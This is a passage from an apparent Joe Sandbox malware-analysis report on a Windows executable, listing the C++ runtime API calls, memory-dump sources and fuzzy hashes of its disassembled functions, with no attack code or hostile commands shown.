                                                                                                                                                                                                              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,00007FF735DD4B87), ref: 00007FF735DE8A76
                                                                                                                                                                                                              • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,?,?,?,00007FF735DD4B87), ref: 00007FF735DE8A9F
                                                                                                                                                                                                              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,00007FF735DD4B87), ref: 00007FF735DE8AC6
                                                                                                                                                                                                              • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,00007FF735DD4B87), ref: 00007FF735DE8B0C
                                                                                                                                                                                                              • ?uncaught_exceptions@std@@YAHXZ.MSVCP140(?,?,?,?,?,00007FF735DD4B87), ref: 00007FF735DE8B13
                                                                                                                                                                                                              • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,?,?,00007FF735DD4B87), ref: 00007FF735DE8B20
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 729925803-0
                                                                                                                                                                                                              • Opcode ID: ad752f3c27af0dea88d10ea897f2c9e857b8ae3bd7b7b1bc57956cfd2447523e
                                                                                                                                                                                                              • Instruction ID: 3c4a0f3b747db28ca07719e2ef9694d3ac978d91f9e221f8d2680ea4cc6d816d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad752f3c27af0dea88d10ea897f2c9e857b8ae3bd7b7b1bc57956cfd2447523e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C6517122618A4292EB25DF19E5C5238E7A0FB85F95F95C631CE5E437A0CF3DD442A350
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF735DE7DCA), ref: 00007FF735DE90CD
                                                                                                                                                                                                              • ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF735DE7DCA), ref: 00007FF735DE90E7
                                                                                                                                                                                                              • ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF735DE7DCA), ref: 00007FF735DE9119
                                                                                                                                                                                                              • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF735DE7DCA), ref: 00007FF735DE9144
                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00007FF735DE915D
                                                                                                                                                                                                              • ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF735DE7DCA), ref: 00007FF735DE917C
                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DE91A7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 762505753-0
                                                                                                                                                                                                              • Opcode ID: 8d453049321c28120332f4843a549bea360398ac6f13708075c04a3396c00665
                                                                                                                                                                                                              • Instruction ID: 2af62fe597b38984849f5aafb26619ba97d8976b72e9cf6a12df5951af033d1a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d453049321c28120332f4843a549bea360398ac6f13708075c04a3396c00665
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB318426A19B43A1EB18AF11E884169B370FB88FD4F880631DB9E07768DF3CE441D710
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Concurrency::cancel_current_taskmemset$ControlDevice_invalid_parameter_noinfo_noreturnmalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4066468686-0
                                                                                                                                                                                                              • Opcode ID: 59cd26df68e075756a438300fcd6a13996211d2d9c7245ee1d7572b30236f00a
                                                                                                                                                                                                              • Instruction ID: db3963a4441066795ed842a2858c72c13707b31fc760479b67034bdf5a48eddc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 59cd26df68e075756a438300fcd6a13996211d2d9c7245ee1d7572b30236f00a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F71B532A19B8295EA25EB15E084369F3A0FB84FA0F944335EAAD03BD5CF7DD441D750
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: strstr
                                                                                                                                                                                                              • String ID: ###$Collapsed=%d$Pos=%d,%d$Size=%d,%d$[%s][%s]
                                                                                                                                                                                                              • API String ID: 1392478783-2972057365
                                                                                                                                                                                                              • Opcode ID: 1e491f211d45ecd41bcd29b71414cce088908a3ffd1bf8d7c3fc79f173c12dcf
                                                                                                                                                                                                              • Instruction ID: af536bf91b9a50d0d6f903a69d33a08e2b1afb07bd0f55e72738e2520925a1d5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e491f211d45ecd41bcd29b71414cce088908a3ffd1bf8d7c3fc79f173c12dcf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC51EF32A28683E6DB15EF12E481479B7A2FB84F80F858135DA9D47758DF3CE441DB60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2016347663-0
                                                                                                                                                                                                              • Opcode ID: c9b30169ca998f5a49f008c88493139130241357a60e0c52ee35b2ed4dbe3de6
                                                                                                                                                                                                              • Instruction ID: 5918b051310b4a5d123322f4acd4831b88468b5b9d153015b5a3e432d20fa1f6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9b30169ca998f5a49f008c88493139130241357a60e0c52ee35b2ed4dbe3de6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C041F462B29A47A4EE18AB12A9843BDE261FB44FD4F944231DF9E07785DE3CD081A310
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF735DD29C8), ref: 00007FF735DE9FDA
                                                                                                                                                                                                              • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF735DD29C8), ref: 00007FF735DE9FE9
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF735DD29C8), ref: 00007FF735DEA01D
                                                                                                                                                                                                              • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF735DD29C8), ref: 00007FF735DEA024
                                                                                                                                                                                                              • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF735DD29C8), ref: 00007FF735DEA033
                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DEA05E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2016347663-0
                                                                                                                                                                                                              • Opcode ID: 074fc4f508f104118e3b30d8110de5020d8f32a2eccf9e0c16eeaac25f808de9
                                                                                                                                                                                                              • Instruction ID: 1d57c93280cd5d0ec2161e6766eb48f20aeba8687c5d9b0ba3aaed398c5d2821
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 074fc4f508f104118e3b30d8110de5020d8f32a2eccf9e0c16eeaac25f808de9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9241B262B29743A5EE19BB11A1842ACE361EB44FD0FD44631DE9D077D9DE3CE081E320
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memmovememset$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2171940698-0
                                                                                                                                                                                                              • Opcode ID: 60ecac6ef8b9f1876bf45d7bd00dbe9412167d2aaf588b70f8101a5b62ee08b4
                                                                                                                                                                                                              • Instruction ID: f79b592ca78eb4bf31d2a86e69363aecc3c82a0fb9a371e907db810e6a83c656
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 60ecac6ef8b9f1876bf45d7bd00dbe9412167d2aaf588b70f8101a5b62ee08b4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F141E662B2AA47A5EE18FF22A184269E3A5EB45FD4F844231DF9E077D5DE3CD0419320
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF735DD2701), ref: 00007FF735DE786C
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF735DD2701), ref: 00007FF735DE7908
                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DE7927
                                                                                                                                                                                                              • ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF735DD2701), ref: 00007FF735DE798B
                                                                                                                                                                                                              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF735DD2701), ref: 00007FF735DE7994
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: D@std@@@std@@U?$char_traits@memset$??1?$basic_ios@??1?$basic_istream@Concurrency::cancel_current_task
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 915423947-0
                                                                                                                                                                                                              • Opcode ID: 7592ee7a7fd9520c02612d7c9c7bba5e713443b708da033a884a3b64f97d5f89
                                                                                                                                                                                                              • Instruction ID: a4faa7015432dc3b9aaab74f8bfdc46e9935aa7b3e057ade98eebff8d7e203db
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7592ee7a7fd9520c02612d7c9c7bba5e713443b708da033a884a3b64f97d5f89
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0041D222B14BC7A5FB18AB65E4803A9A350EB44FA4F944231EB2C077D6DF38E891D351
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z.MSVCP140 ref: 00007FF735DE7D2A
                                                                                                                                                                                                              • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF735DE7D47
                                                                                                                                                                                                              • _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF735DE7D70
                                                                                                                                                                                                              • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF735DE7DBB
                                                                                                                                                                                                                • Part of subcall function 00007FF735DE90A0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF735DE7DCA), ref: 00007FF735DE90CD
                                                                                                                                                                                                                • Part of subcall function 00007FF735DE90A0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF735DE7DCA), ref: 00007FF735DE90E7
                                                                                                                                                                                                                • Part of subcall function 00007FF735DE90A0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF735DE7DCA), ref: 00007FF735DE9119
                                                                                                                                                                                                                • Part of subcall function 00007FF735DE90A0: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF735DE7DCA), ref: 00007FF735DE9144
                                                                                                                                                                                                                • Part of subcall function 00007FF735DE90A0: std::_Facet_Register.LIBCPMT ref: 00007FF735DE915D
                                                                                                                                                                                                                • Part of subcall function 00007FF735DE90A0: ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF735DE7DCA), ref: 00007FF735DE917C
                                                                                                                                                                                                              • ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF735DE7DD0
                                                                                                                                                                                                              • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF735DE7DE7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: D@std@@@std@@U?$char_traits@$Init@?$basic_streambuf@Lockit@std@@$??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@Bid@locale@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3911317180-0
                                                                                                                                                                                                              • Opcode ID: cb1c486c5891193a5e828c942d37560bccd97b3465428ccdbbd7e96aa0c3771a
                                                                                                                                                                                                              • Instruction ID: 0c76ed498abb0ac49996cf8e28c7fd1ace5c06b67f4d4524119685f2592cdd66
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb1c486c5891193a5e828c942d37560bccd97b3465428ccdbbd7e96aa0c3771a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C318D32629B8291EB98EF25E884329B3A4FB48F88F440135DE8D47B58DF3CD455D750
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __std_fs_code_page.MSVCPRT ref: 00007FF735DD71AF
                                                                                                                                                                                                                • Part of subcall function 00007FF735DEB9B0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,00007FF735DD71B4), ref: 00007FF735DEB9B4
                                                                                                                                                                                                                • Part of subcall function 00007FF735DEB9B0: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF735DD71B4), ref: 00007FF735DEB9C3
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD732D
                                                                                                                                                                                                                • Part of subcall function 00007FF735DE9580: memmove.VCRUNTIME140(?,00000000,00000004,?,00007FF735DD72FA), ref: 00007FF735DE9662
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD737B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$ApisFile___lc_codepage_func__std_fs_code_pagememmove
                                                                                                                                                                                                              • String ID: ", "$: "
                                                                                                                                                                                                              • API String ID: 1229626011-747220369
                                                                                                                                                                                                              • Opcode ID: 66f70a2130dd12123222d8d70e99f143ef02b8dd501f163f7f5f328fcc77e5c4
                                                                                                                                                                                                              • Instruction ID: 3e548fea8a48d6e4baf1967c56f6009affb6668b802cef17f03d357d3dd53d23
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66f70a2130dd12123222d8d70e99f143ef02b8dd501f163f7f5f328fcc77e5c4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E61AF62B14B42AAEB04EF65E5803BC63A2FB48F88F804531DE5D17B99DF38D551D390
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                              • Opcode ID: c5a116ecbc7fcd4e730fcb505c56cfab96722ebf421517b132b46b27566b64a1
                                                                                                                                                                                                              • Instruction ID: 350f3eea673a1b678999018055b21d96b92aa49d9dcb616a5e06cc356a683eed
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5a116ecbc7fcd4e730fcb505c56cfab96722ebf421517b132b46b27566b64a1
